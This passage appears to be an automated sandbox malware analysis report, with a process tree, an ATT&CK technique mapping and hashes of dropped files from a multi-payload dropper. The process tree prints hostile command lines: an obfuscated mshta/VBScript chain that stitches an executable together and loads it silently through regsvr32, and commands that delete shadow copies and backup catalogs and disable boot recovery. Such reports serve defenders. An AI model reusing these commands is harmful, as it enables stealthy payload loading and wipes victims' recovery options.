                                                                                                                                                              "C:\Windows\System32\mshta.exe" VBsCRiPt: cLOse ( CrEAteObjECt ( "WscRipt.sHElL" ). rUN ( "CmD /q /c EcHO vmbeC:\Users\Admin\AppData\Roaming_Wxf> C0iS.XE & echo | Set /P = ""MZ"" > 66WBQ~Nm.TVY & CoPY /y /B 66WBQ~Nm.TvY + Amo1ATs.M5 + eBH3o.q9X+ afLCPDH.SV +tMs2M.8AZ + PDPCi.BNj + C0IS.xe nKBJL.CW6 & StArT regsvr32.exe /U .\NKBJL.cW6 /S ", 0 , trUe ) )
                                                                                                                                                              5⤵
                                                                                                                                                                PID:4512
                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /q /c EcHO vmbeC:\Users\Admin\AppData\Roaming_Wxf> C0iS.XE & echo | Set /P = "MZ" > 66WBQ~Nm.TVY &CoPY /y /B 66WBQ~Nm.TvY+Amo1ATs.M5 + eBH3o.q9X+ afLCPDH.SV +tMs2M.8AZ + PDPCi.BNj + C0IS.xe nKBJL.CW6 & StArT regsvr32.exe /U .\NKBJL.cW6 /S
                                                                                                                                                                  6⤵
                                                                                                                                                                    PID:4960
                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>66WBQ~Nm.TVY"
                                                                                                                                                                      7⤵
                                                                                                                                                                        PID:588
                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        C:\Windows\system32\cmd.exe /S /D /c" echo "
                                                                                                                                                                        7⤵
                                                                                                                                                                          PID:5628
                                                                                                                                                                        • C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                          regsvr32.exe /U .\NKBJL.cW6 /S
                                                                                                                                                                          7⤵
                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                          PID:5728
                                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                    taskkill -Im "5341.exe" /f
                                                                                                                                                                    4⤵
                                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                                    PID:4908
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\6826.exe
                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\6826.exe
                                                                                                                                                              1⤵
                                                                                                                                                              • Enumerates connected drives
                                                                                                                                                              PID:5448
                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:3992
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\6826.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\6826.exe" -agent 0
                                                                                                                                                                  2⤵
                                                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                  PID:5348
                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  "C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet
                                                                                                                                                                  2⤵
                                                                                                                                                                    PID:2876
                                                                                                                                                                    • C:\Windows\SysWOW64\vssadmin.exe
                                                                                                                                                                      vssadmin delete shadows /all /quiet
                                                                                                                                                                      3⤵
                                                                                                                                                                      • Interacts with shadow copies
                                                                                                                                                                      PID:4876
                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    "C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet
                                                                                                                                                                    2⤵
                                                                                                                                                                      PID:1368
                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
                                                                                                                                                                      2⤵
                                                                                                                                                                        PID:2416
                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        "C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete
                                                                                                                                                                        2⤵
                                                                                                                                                                          PID:6116
                                                                                                                                                                          • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                            wmic shadowcopy delete
                                                                                                                                                                            3⤵
                                                                                                                                                                              PID:5972
                                                                                                                                                                          • C:\Windows\SysWOW64\notepad.exe
                                                                                                                                                                            notepad.exe
                                                                                                                                                                            2⤵
                                                                                                                                                                              PID:2780
                                                                                                                                                                          • C:\Windows\system32\vssvc.exe
                                                                                                                                                                            C:\Windows\system32\vssvc.exe
                                                                                                                                                                            1⤵
                                                                                                                                                                              PID:4572

                                                                                                                                                                            Network

                                                                                                                                                                            MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                            Execution

                                                                                                                                                                            Scheduled Task

                                                                                                                                                                            1
                                                                                                                                                                            T1053

                                                                                                                                                                            Persistence

                                                                                                                                                                            Modify Existing Service

                                                                                                                                                                            1
                                                                                                                                                                            T1031

                                                                                                                                                                            Registry Run Keys / Startup Folder

                                                                                                                                                                            1
                                                                                                                                                                            T1060

                                                                                                                                                                            Scheduled Task

                                                                                                                                                                            1
                                                                                                                                                                            T1053

                                                                                                                                                                            Hidden Files and Directories

                                                                                                                                                                            1
                                                                                                                                                                            T1158

                                                                                                                                                                            Privilege Escalation

                                                                                                                                                                            Scheduled Task

                                                                                                                                                                            1
                                                                                                                                                                            T1053

                                                                                                                                                                            Defense Evasion

                                                                                                                                                                            Modify Registry

                                                                                                                                                                            3
                                                                                                                                                                            T1112

                                                                                                                                                                            Disabling Security Tools

                                                                                                                                                                            1
                                                                                                                                                                            T1089

                                                                                                                                                                            File Deletion

                                                                                                                                                                            2
                                                                                                                                                                            T1107

                                                                                                                                                                            Virtualization/Sandbox Evasion

                                                                                                                                                                            1
                                                                                                                                                                            T1497

                                                                                                                                                                            Install Root Certificate

                                                                                                                                                                            1
                                                                                                                                                                            T1130

                                                                                                                                                                            Hidden Files and Directories

                                                                                                                                                                            1
                                                                                                                                                                            T1158

                                                                                                                                                                            Credential Access

                                                                                                                                                                            Credentials in Files

                                                                                                                                                                            4
                                                                                                                                                                            T1081

                                                                                                                                                                            Discovery

                                                                                                                                                                            Query Registry

                                                                                                                                                                            7
                                                                                                                                                                            T1012

                                                                                                                                                                            Virtualization/Sandbox Evasion

                                                                                                                                                                            1
                                                                                                                                                                            T1497

                                                                                                                                                                            System Information Discovery

                                                                                                                                                                            7
                                                                                                                                                                            T1082

                                                                                                                                                                            Peripheral Device Discovery

                                                                                                                                                                            2
                                                                                                                                                                            T1120

                                                                                                                                                                            Collection

                                                                                                                                                                            Data from Local System

                                                                                                                                                                            4
                                                                                                                                                                            T1005

                                                                                                                                                                            Command and Control

                                                                                                                                                                            Web Service

                                                                                                                                                                            1
                                                                                                                                                                            T1102

                                                                                                                                                                            Impact

                                                                                                                                                                            Inhibit System Recovery

                                                                                                                                                                            2
                                                                                                                                                                            T1490

                                                                                                                                                                            Replay Monitor

                                                                                                                                                                            Loading Replay Monitor...

                                                                                                                                                                            Downloads

                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS888D4164\libcurl.dll
                                                                                                                                                                              MD5

                                                                                                                                                                              d09be1f47fd6b827c81a4812b4f7296f

                                                                                                                                                                              SHA1

                                                                                                                                                                              028ae3596c0790e6d7f9f2f3c8e9591527d267f7

                                                                                                                                                                              SHA256

                                                                                                                                                                              0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

                                                                                                                                                                              SHA512

                                                                                                                                                                              857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS888D4164\libcurlpp.dll
                                                                                                                                                                              MD5

                                                                                                                                                                              e6e578373c2e416289a8da55f1dc5e8e

                                                                                                                                                                              SHA1

                                                                                                                                                                              b601a229b66ec3d19c2369b36216c6f6eb1c063e

                                                                                                                                                                              SHA256

                                                                                                                                                                              43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f

                                                                                                                                                                              SHA512

                                                                                                                                                                              9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS888D4164\libgcc_s_dw2-1.dll
                                                                                                                                                                              MD5

                                                                                                                                                                              9aec524b616618b0d3d00b27b6f51da1

                                                                                                                                                                              SHA1

                                                                                                                                                                              64264300801a353db324d11738ffed876550e1d3

                                                                                                                                                                              SHA256

                                                                                                                                                                              59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e

                                                                                                                                                                              SHA512

                                                                                                                                                                              0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS888D4164\libstdc++-6.dll
                                                                                                                                                                              MD5

                                                                                                                                                                              5e279950775baae5fea04d2cc4526bcc

                                                                                                                                                                              SHA1

                                                                                                                                                                              8aef1e10031c3629512c43dd8b0b5d9060878453

                                                                                                                                                                              SHA256

                                                                                                                                                                              97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87

                                                                                                                                                                              SHA512

                                                                                                                                                                              666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS888D4164\libwinpthread-1.dll
                                                                                                                                                                              MD5

                                                                                                                                                                              1e0d62c34ff2e649ebc5c372065732ee

                                                                                                                                                                              SHA1

                                                                                                                                                                              fcfaa36ba456159b26140a43e80fbd7e9d9af2de

                                                                                                                                                                              SHA256

                                                                                                                                                                              509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723

                                                                                                                                                                              SHA512

                                                                                                                                                                              3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS888D4164\setup_install.exe
                                                                                                                                                                              MD5

                                                                                                                                                                              a3ca32ebdba2c07c2d386bb31cbd6d51

                                                                                                                                                                              SHA1

                                                                                                                                                                              e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                                                                                                                                              SHA256

                                                                                                                                                                              0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                                                                                                                                              SHA512

                                                                                                                                                                              c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS888D4164\setup_install.exe
                                                                                                                                                                              MD5

                                                                                                                                                                              a3ca32ebdba2c07c2d386bb31cbd6d51

                                                                                                                                                                              SHA1

                                                                                                                                                                              e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                                                                                                                                              SHA256

                                                                                                                                                                              0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                                                                                                                                              SHA512

                                                                                                                                                                              c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS888D4164\sonia_1.exe
                                                                                                                                                                              MD5

                                                                                                                                                                              6e43430011784cff369ea5a5ae4b000f

                                                                                                                                                                              SHA1

                                                                                                                                                                              5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                                                                              SHA256

                                                                                                                                                                              a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                                                                              SHA512

                                                                                                                                                                              33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS888D4164\sonia_1.exe
                                                                                                                                                                              MD5

                                                                                                                                                                              6e43430011784cff369ea5a5ae4b000f

                                                                                                                                                                              SHA1

                                                                                                                                                                              5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                                                                              SHA256

                                                                                                                                                                              a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                                                                              SHA512

                                                                                                                                                                              33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS888D4164\sonia_1.txt
                                                                                                                                                                              MD5

                                                                                                                                                                              6e43430011784cff369ea5a5ae4b000f

                                                                                                                                                                              SHA1

                                                                                                                                                                              5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                                                                              SHA256

                                                                                                                                                                              a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                                                                              SHA512

                                                                                                                                                                              33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS888D4164\sonia_2.exe
                                                                                                                                                                              MD5

                                                                                                                                                                              18ffdaa7a2c9906db10ffc13f7c73d23

                                                                                                                                                                              SHA1

                                                                                                                                                                              f195661bc0f9735d02fbe0e937bfd80cf0bcb11f

                                                                                                                                                                              SHA256

                                                                                                                                                                              365bbeb36a288d829c8dc0f1bf7f70949dd10474586cfc7123c1503256b9e5c3

                                                                                                                                                                              SHA512

                                                                                                                                                                              db1f81c5b6cac59d6e58e8ab4020bdef7386fa1aa7297f57f693334b70d3dd553ab844f85f92e9903b667cae19f30f188f84939ac0bba2f5999d5bf89793ea34

                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS888D4164\sonia_2.txt
                                                                                                                                                                              MD5

                                                                                                                                                                              18ffdaa7a2c9906db10ffc13f7c73d23

                                                                                                                                                                              SHA1

                                                                                                                                                                              f195661bc0f9735d02fbe0e937bfd80cf0bcb11f

                                                                                                                                                                              SHA256

                                                                                                                                                                              365bbeb36a288d829c8dc0f1bf7f70949dd10474586cfc7123c1503256b9e5c3

                                                                                                                                                                              SHA512

                                                                                                                                                                              db1f81c5b6cac59d6e58e8ab4020bdef7386fa1aa7297f57f693334b70d3dd553ab844f85f92e9903b667cae19f30f188f84939ac0bba2f5999d5bf89793ea34

                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS888D4164\sonia_3.exe
                                                                                                                                                                              MD5

                                                                                                                                                                              ee658be7ea7269085f4004d68960e547

                                                                                                                                                                              SHA1

                                                                                                                                                                              979afc4726af14d9079b6cf288686b0e7e4a17e5

                                                                                                                                                                              SHA256

                                                                                                                                                                              d7e078e3e520767a92acb1eaadf4c7ef75f30e215be4dddfebe684c2504c6fe3

                                                                                                                                                                              SHA512

                                                                                                                                                                              fc77c079d152b595e249c13b9b0ca97d525407e228c416630a2565707eaacd6805fe1a1c6029b0032d493ae5b67c7d566cc19ab317d9c8e56dfdabc3646d5b1e

                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS888D4164\sonia_3.txt
                                                                                                                                                                              MD5

                                                                                                                                                                              ee658be7ea7269085f4004d68960e547

                                                                                                                                                                              SHA1

                                                                                                                                                                              979afc4726af14d9079b6cf288686b0e7e4a17e5

                                                                                                                                                                              SHA256

                                                                                                                                                                              d7e078e3e520767a92acb1eaadf4c7ef75f30e215be4dddfebe684c2504c6fe3

                                                                                                                                                                              SHA512

                                                                                                                                                                              fc77c079d152b595e249c13b9b0ca97d525407e228c416630a2565707eaacd6805fe1a1c6029b0032d493ae5b67c7d566cc19ab317d9c8e56dfdabc3646d5b1e

                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS888D4164\sonia_4.exe
                                                                                                                                                                              MD5

                                                                                                                                                                              6765fe4e4be8c4daf3763706a58f42d0

                                                                                                                                                                              SHA1

                                                                                                                                                                              cebb504bfc3097a95d40016f01123b275c97d58c

                                                                                                                                                                              SHA256

                                                                                                                                                                              755a4266245c52bcd0328044c8a0908b2daafbad140cee06830b991493f21f60

                                                                                                                                                                              SHA512

                                                                                                                                                                              c6b8d328768040b31aad0441258240ce8e99a80dba028462bd03ad9d5964d4877c296f25a5a2ca59bcafe0ad75297da39352c17f3df1bb79ec091e5ace3b5d55

                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS888D4164\sonia_4.txt
                                                                                                                                                                              MD5

                                                                                                                                                                              6765fe4e4be8c4daf3763706a58f42d0

                                                                                                                                                                              SHA1

                                                                                                                                                                              cebb504bfc3097a95d40016f01123b275c97d58c

                                                                                                                                                                              SHA256

                                                                                                                                                                              755a4266245c52bcd0328044c8a0908b2daafbad140cee06830b991493f21f60

                                                                                                                                                                              SHA512

                                                                                                                                                                              c6b8d328768040b31aad0441258240ce8e99a80dba028462bd03ad9d5964d4877c296f25a5a2ca59bcafe0ad75297da39352c17f3df1bb79ec091e5ace3b5d55

                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS888D4164\sonia_5.exe
                                                                                                                                                                              MD5

                                                                                                                                                                              0c3f670f496ffcf516fe77d2a161a6ee

                                                                                                                                                                              SHA1

                                                                                                                                                                              0c59d3494b38d768fe120e0a4ca2a1dca7567e6e

                                                                                                                                                                              SHA256

                                                                                                                                                                              8ed9f410b41e51f09304e5cdadc4d61f82562c9ee15be810e063f2f568812dd0

                                                                                                                                                                              SHA512

                                                                                                                                                                              bce80fa77557683645480ec28bf5f3a4facb780728d709166890c18decb2095509f69c524e4ce5fbcb48788961554be0467dc78db70f1fd2d242dbd5922a1095

                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS888D4164\sonia_5.txt
                                                                                                                                                                              MD5

                                                                                                                                                                              0c3f670f496ffcf516fe77d2a161a6ee

                                                                                                                                                                              SHA1

                                                                                                                                                                              0c59d3494b38d768fe120e0a4ca2a1dca7567e6e

                                                                                                                                                                              SHA256

                                                                                                                                                                              8ed9f410b41e51f09304e5cdadc4d61f82562c9ee15be810e063f2f568812dd0

                                                                                                                                                                              SHA512

                                                                                                                                                                              bce80fa77557683645480ec28bf5f3a4facb780728d709166890c18decb2095509f69c524e4ce5fbcb48788961554be0467dc78db70f1fd2d242dbd5922a1095

                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS888D4164\sonia_6.exe
                                                                                                                                                                              MD5

                                                                                                                                                                              2eb68e495e4eb18c86a443b2754bbab2

                                                                                                                                                                              SHA1

                                                                                                                                                                              82a535e1277ea7a80b809cfeb97dcfb5a5d48a37

                                                                                                                                                                              SHA256

                                                                                                                                                                              a9083c13dd04bf55cc8e29ab4fe8a0053edf3ffe9b1e5ec31db207a45a98aaaf

                                                                                                                                                                              SHA512

                                                                                                                                                                              f7dc8d9a8726a6da6226a059094fcaf45190b2b41e6fae7d2aa48eacbd1dfc3b871770c74b1504801f5e7a05f1e3b47ac13cffc8190089f3d07e5c55aa725898

                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS888D4164\sonia_6.txt
                                                                                                                                                                              MD5

                                                                                                                                                                              2eb68e495e4eb18c86a443b2754bbab2

                                                                                                                                                                              SHA1

                                                                                                                                                                              82a535e1277ea7a80b809cfeb97dcfb5a5d48a37

                                                                                                                                                                              SHA256

                                                                                                                                                                              a9083c13dd04bf55cc8e29ab4fe8a0053edf3ffe9b1e5ec31db207a45a98aaaf

                                                                                                                                                                              SHA512

                                                                                                                                                                              f7dc8d9a8726a6da6226a059094fcaf45190b2b41e6fae7d2aa48eacbd1dfc3b871770c74b1504801f5e7a05f1e3b47ac13cffc8190089f3d07e5c55aa725898

                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\axhub.dat
                                                                                                                                                                              MD5

                                                                                                                                                                              99ab358c6f267b09d7a596548654a6ba

                                                                                                                                                                              SHA1

                                                                                                                                                                              d5a643074b69be2281a168983e3f6bef7322f676

                                                                                                                                                                              SHA256

                                                                                                                                                                              586339f93c9c0eed8a42829ab307f2c5381a636edbcf80df3770c27555034380

                                                                                                                                                                              SHA512

                                                                                                                                                                              952040785a3c1dcaea613d2e0d46745d5b631785d26de018fd9f85f8485161d056bf67b19c96ae618d35de5d5991a0dd549d749949faea7a2e0f9991a1aa2b2b

                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\axhub.dll
                                                                                                                                                                              MD5

                                                                                                                                                                              1c7be730bdc4833afb7117d48c3fd513

                                                                                                                                                                              SHA1

                                                                                                                                                                              dc7e38cfe2ae4a117922306aead5a7544af646b8

                                                                                                                                                                              SHA256

                                                                                                                                                                              8206b4b3897ca45b9e083273f616902966e57091516844906e6ae2aefe63cef1

                                                                                                                                                                              SHA512

                                                                                                                                                                              7936c862a06b7ecdb6710a1bb62cbea149f75504b580c2f100945674c987f3eec53e9aa5915e32b4f74bcf46f2df9468f68a454400faebd909f933e8072e0f2e

                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                              MD5

                                                                                                                                                                              b7161c0845a64ff6d7345b67ff97f3b0

                                                                                                                                                                              SHA1

                                                                                                                                                                              d223f855da541fe8e4c1d5c50cb26da0a1deb5fc

                                                                                                                                                                              SHA256

                                                                                                                                                                              fe9e28ff0b652e22a124b0a05382bc1ac48cbd9c7c76ca647b0c9f8542888f66

                                                                                                                                                                              SHA512

                                                                                                                                                                              98d8971ff20ba256cf886a9db416ac9366d2c6ad4ff51a65bd7e539974dc93f4c897f92d8c9c0319c69b27eacf05cd350a0302828e63190b03457a0eda57f680

                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                              MD5

                                                                                                                                                                              7fee8223d6e4f82d6cd115a28f0b6d58

                                                                                                                                                                              SHA1

                                                                                                                                                                              1b89c25f25253df23426bd9ff6c9208f1202f58b

                                                                                                                                                                              SHA256

                                                                                                                                                                              a45317c374d54e322153afd73f0e90f1486638d77b7fd85746d091071bbecd59

                                                                                                                                                                              SHA512

                                                                                                                                                                              3ed900b83dd178637c2fd4e8444a899f17f12c4ec92a6f4de4fe544fe8d41b521c69b8f348343cb397d0e160f23e27429042d758b5fa5acac0bab5c3584bace4

                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                              MD5

                                                                                                                                                                              7fee8223d6e4f82d6cd115a28f0b6d58

                                                                                                                                                                              SHA1

                                                                                                                                                                              1b89c25f25253df23426bd9ff6c9208f1202f58b

                                                                                                                                                                              SHA256

                                                                                                                                                                              a45317c374d54e322153afd73f0e90f1486638d77b7fd85746d091071bbecd59

                                                                                                                                                                              SHA512

                                                                                                                                                                              3ed900b83dd178637c2fd4e8444a899f17f12c4ec92a6f4de4fe544fe8d41b521c69b8f348343cb397d0e160f23e27429042d758b5fa5acac0bab5c3584bace4

                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                              MD5

                                                                                                                                                                              a6279ec92ff948760ce53bba817d6a77

                                                                                                                                                                              SHA1

                                                                                                                                                                              5345505e12f9e4c6d569a226d50e71b5a572dce2

                                                                                                                                                                              SHA256

                                                                                                                                                                              8b581869bf8944a8e0aa169adea2a4afe47434123da477132880aff6a5032181

                                                                                                                                                                              SHA512

                                                                                                                                                                              213cb374f1273c899e0c88a20c0101a7c28024ce5046a2e0d7898bd182d918288bb80367fea4454c437c057ff9ed4fffd42be48a13ca73653021a6d63e1cfa9c

                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                              MD5

                                                                                                                                                                              a6279ec92ff948760ce53bba817d6a77

                                                                                                                                                                              SHA1

                                                                                                                                                                              5345505e12f9e4c6d569a226d50e71b5a572dce2

                                                                                                                                                                              SHA256

                                                                                                                                                                              8b581869bf8944a8e0aa169adea2a4afe47434123da477132880aff6a5032181

                                                                                                                                                                              SHA512

                                                                                                                                                                              213cb374f1273c899e0c88a20c0101a7c28024ce5046a2e0d7898bd182d918288bb80367fea4454c437c057ff9ed4fffd42be48a13ca73653021a6d63e1cfa9c

                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                                                                                                                                                                              MD5

                                                                                                                                                                              74231678f536a19b3016840f56b845c7

                                                                                                                                                                              SHA1

                                                                                                                                                                              a5645777558a7d5905e101e54d61b0c8c1120de3

                                                                                                                                                                              SHA256

                                                                                                                                                                              cd53d44c68b4b58f88aa945ca38dd18e0a66c3f0854f5868fbea4345f7819fb4

                                                                                                                                                                              SHA512

                                                                                                                                                                              4117ad2bcdca9104ca8a53df0f7de102509ba6eb264d025ab1facd7a7ca0c14a1c4dd17de130521c4169aaaaeb6e779579dcb16d63a58b77feebfdc32d983d1f

                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                                                                                                                                                                              MD5

                                                                                                                                                                              74231678f536a19b3016840f56b845c7

                                                                                                                                                                              SHA1

                                                                                                                                                                              a5645777558a7d5905e101e54d61b0c8c1120de3

                                                                                                                                                                              SHA256

                                                                                                                                                                              cd53d44c68b4b58f88aa945ca38dd18e0a66c3f0854f5868fbea4345f7819fb4

                                                                                                                                                                              SHA512

                                                                                                                                                                              4117ad2bcdca9104ca8a53df0f7de102509ba6eb264d025ab1facd7a7ca0c14a1c4dd17de130521c4169aaaaeb6e779579dcb16d63a58b77feebfdc32d983d1f

                                                                                                                                                                            • C:\Users\Admin\Documents\00Hdsi7rWcVceyZ8jsPqh1_p.exe
                                                                                                                                                                              MD5

                                                                                                                                                                              1b6a482264775b5ab5b792c89f4cb272

                                                                                                                                                                              SHA1

                                                                                                                                                                              c265d55a702cb0323f7347bea2915e8c63d89983

                                                                                                                                                                              SHA256

                                                                                                                                                                              19415b0f141eba1d036f14bc99b970db90e5f29b2656f69a56980b19214994b2

                                                                                                                                                                              SHA512

                                                                                                                                                                              5afaf1a5671962f752a28972d8b8fc348c1c1cc126d3ced48a0647eb37fb83d0910d7f4cacd31e17e9fb6a9dede8554be28fb48de275251440e30fe3b8a67113

                                                                                                                                                                            • C:\Users\Admin\Documents\2Xap7nelxJsjTD22X7JqiSAt.exe
                                                                                                                                                                              MD5

                                                                                                                                                                              80aabd5337136686aefe2ff1e6da8d5a

                                                                                                                                                                              SHA1

                                                                                                                                                                              a749d303f5a928cff0d66ac23a704b90837ea0f9

                                                                                                                                                                              SHA256

                                                                                                                                                                              afd7b91be42e614fa8f3488f8cf2024b1a5b364c4b66c514fa86940b06c93515

                                                                                                                                                                              SHA512

                                                                                                                                                                              5472e503c6e18297efcac3cb0b78dd1c4798f6d60695bf738aba8cfdf42902a2b9d5fb0bf35503750efd6a31ea1cb0144fa07f3f31aeaaee8bd492c0a501fe5a

                                                                                                                                                                            • C:\Users\Admin\Documents\2Xap7nelxJsjTD22X7JqiSAt.exe
                                                                                                                                                                              MD5

                                                                                                                                                                              80aabd5337136686aefe2ff1e6da8d5a

                                                                                                                                                                              SHA1

                                                                                                                                                                              a749d303f5a928cff0d66ac23a704b90837ea0f9

                                                                                                                                                                              SHA256

                                                                                                                                                                              afd7b91be42e614fa8f3488f8cf2024b1a5b364c4b66c514fa86940b06c93515

                                                                                                                                                                              SHA512

                                                                                                                                                                              5472e503c6e18297efcac3cb0b78dd1c4798f6d60695bf738aba8cfdf42902a2b9d5fb0bf35503750efd6a31ea1cb0144fa07f3f31aeaaee8bd492c0a501fe5a

                                                                                                                                                                            • C:\Users\Admin\Documents\2e_Il091SkxYBeoP2irEExyU.exe
                                                                                                                                                                              MD5

                                                                                                                                                                              f4f84d3d5b323dfbb6caaded7bb6d3cd

                                                                                                                                                                              SHA1

                                                                                                                                                                              5008dbe750ff960d4d0a154c483d3b34d660b0c4

                                                                                                                                                                              SHA256

                                                                                                                                                                              1f054ea8745ad2be3ef11bcbce4a61312da5019a586b40f4263e3b494912fdab

                                                                                                                                                                              SHA512

                                                                                                                                                                              8f454fbba0505a379270805640ddc4f7fd302707df433b8e2725dd50ef905baeeecb42be0c3f9b2eff18ce5d2f88d65db8df2e03524335d4f6ed773ce72f804c

                                                                                                                                                                            • C:\Users\Admin\Documents\5phtB6bewloqGEv14r830yZA.exe
                                                                                                                                                                              MD5

                                                                                                                                                                              9cf9a63405d85e8f717f237be9cefe6d

                                                                                                                                                                              SHA1

                                                                                                                                                                              5fb0735ce41e90605fa312281d9191fa98fc554c

                                                                                                                                                                              SHA256

                                                                                                                                                                              477852eb14adf55a682013a88d39bc536f2d3550d1ff3a3de3b0c71a330d10bc

                                                                                                                                                                              SHA512

                                                                                                                                                                              2181878cd27b8e406bb3063795fbf3cc6deca73095f915d9fd0b6f0b347edde6550afde9bad95644d7cb57988d55f9d1bf9ec6a8460ebcdf3269c866b2f8814c

                                                                                                                                                                            • C:\Users\Admin\Documents\5phtB6bewloqGEv14r830yZA.exe
                                                                                                                                                                              MD5

                                                                                                                                                                              9cf9a63405d85e8f717f237be9cefe6d

                                                                                                                                                                              SHA1

